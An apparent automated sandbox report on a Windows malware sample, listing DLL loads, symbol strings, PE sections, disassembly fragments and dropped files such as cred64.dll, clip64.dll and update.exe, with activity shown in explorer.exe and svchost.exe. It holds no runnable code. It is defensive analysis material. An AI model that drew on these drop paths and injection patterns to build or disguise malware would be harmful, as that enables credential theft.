Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Section loaded: ntasn1.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DE77BA04-3C92-4d11-A1A5-42352A53E0E3}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Source: yINR7uQlPr.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: yINR7uQlPr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245746365.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246067900.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb; source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241284492.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241984834.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240794322.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243521311.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244768009.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246183677.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbat source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: dows\dll\mscorlib.pdb source: powershell.exe, 00000020.00000002.2612705692.00000219A9004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241592467.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243911711.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243013801.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244627444.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241018419.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242374350.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240577463.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241164887.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244255606.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbj source: D7AB.tmp.ssg.exe, 00000011.00000002.2662161359.0000000006DC2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\select.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242660001.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: CC11.tmp.ctx.exe, 00000010.00000002.2270141203.00007FF8B83B5000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2239182239.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2270815482.00007FF8BFB9E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246391912.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdbat.6 source: powershell.exe, 00000020.00000002.2612509667.00000219A8FF9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241491504.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243251482.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb8 source: powershell.exe, 00000020.00000002.2607042832.00000219A8EC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242215513.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240684273.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244077458.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: D7AB.tmp.ssg.exe, 00000011.00000002.2576601538.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb} source: powershell.exe, 00000020.00000002.2602449809.00000219A8BAA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\python38.pdb source: CC11.tmp.ctx.exe, 00000010.00000002.2269356516.00007FF8A87CD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241882128.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245858639.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242520362.0000023FC7271000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242085986.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246488809.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb- source: powershell.exe, 00000020.00000002.2612134704.00000219A8FE3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242778373.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2243738070.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2242897832.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000020.00000002.2607042832.00000219A8ED5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241382996.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2245955915.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241786754.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2241692866.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2244947833.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: CC11.tmp.ctx.exe, 0000000B.00000003.2246284261.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp

Source: D7AB.tmp.ssg.exe.4.dr

Static PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E381050 LoadLibraryA,GetProcAddress,

0_2_00007FF79E381050

Source: yINR7uQlPr.exe	Static PE information: section name: .x64
Source: 1DC30FADAFF92643095942.exe.0.dr	Static PE information: section name: .x64
Source: E24B.tmp.update.exe.4.dr	Static PE information: section name: .x64
Source: libcrypto-1_1.dll.11.dr	Static PE information: section name: .00cfg
Source: update[1].exe.20.dr	Static PE information: section name: .x64
Source: update.exe.20.dr	Static PE information: section name: .x64
Source: update.exe0.20.dr	Static PE information: section name: .x64
Source: cred64[1].dll.20.dr	Static PE information: section name: _RDATA
Source: cred64.dll.20.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E38DE59 push rbp; iretd	0_2_00007FF79E38DE5A
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E38DE70 push 00000041h; ret	0_2_00007FF79E38DE74
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E38DEC1 push rcx; iretd	0_2_00007FF79E38DEC2
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Code function: 0_2_00007FF79E38DCC2 push rbp; iretd	0_2_00007FF79E38DCC3
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52BDE70 push 00000041h; ret	1_2_00007FF7E52BDE74
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52BDE59 push rbp; iretd	1_2_00007FF7E52BDE5A
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52BDCC2 push rbp; iretd	1_2_00007FF7E52BDCC3
Source: C:\Windows\System32\svchost.exe	Code function: 1_2_00007FF7E52BDEC1 push rcx; iretd	1_2_00007FF7E52BDEC2
Source: C:\Windows\explorer.exe	Code function: 4_2_033237D6 push rsi; ret	4_2_033237D7
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743DDE59 push rbp; iretd	6_2_00007FF6743DDE5A
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743DDE70 push 00000041h; ret	6_2_00007FF6743DDE74
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743DDCC2 push rbp; iretd	6_2_00007FF6743DDCC3
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Code function: 6_2_00007FF6743DDEC1 push rcx; iretd	6_2_00007FF6743DDEC2
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91BDE59 push rbp; iretd	8_2_00007FF7A91BDE5A
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91BDE70 push 00000041h; ret	8_2_00007FF7A91BDE74
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91BDCC2 push rbp; iretd	8_2_00007FF7A91BDCC3
Source: C:\Windows\System32\audiodg.exe	Code function: 8_2_00007FF7A91BDEC1 push rcx; iretd	8_2_00007FF7A91BDEC2
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179DDCC2 push rbp; iretd	9_2_00007FF7179DDCC3
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179DDEC1 push rcx; iretd	9_2_00007FF7179DDEC2
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179DDE59 push rbp; iretd	9_2_00007FF7179DDE5A
Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179DDE70 push 00000041h; ret	9_2_00007FF7179DDE74
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B832FAED push rdi; ret	16_2_00007FF8B832FAF4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B832A096 push rdi; ret	16_2_00007FF8B832A0A2
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B8330200 push rdi; ret	16_2_00007FF8B8330206
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8B832A5B5 push rdi; ret	16_2_00007FF8B832A5BB
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: 16_2_00007FF8BFB9CB1B push rbp; retf	16_2_00007FF8BFB9CB28
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006BA6B4 push ecx; ret	18_2_006BA6C7
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006A3573 pushad ; ret	18_2_006A358D
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006A750F pushad ; iretd	18_2_006A7510
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: 18_2_006AD989 pushfd ; retf 0000h	18_2_006AD98A
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Code function: 19_2_007B3573 pushad ; ret	19_2_007B358D

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E24B.tmp.update.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	File created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	File created: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll	Jump to dropped file
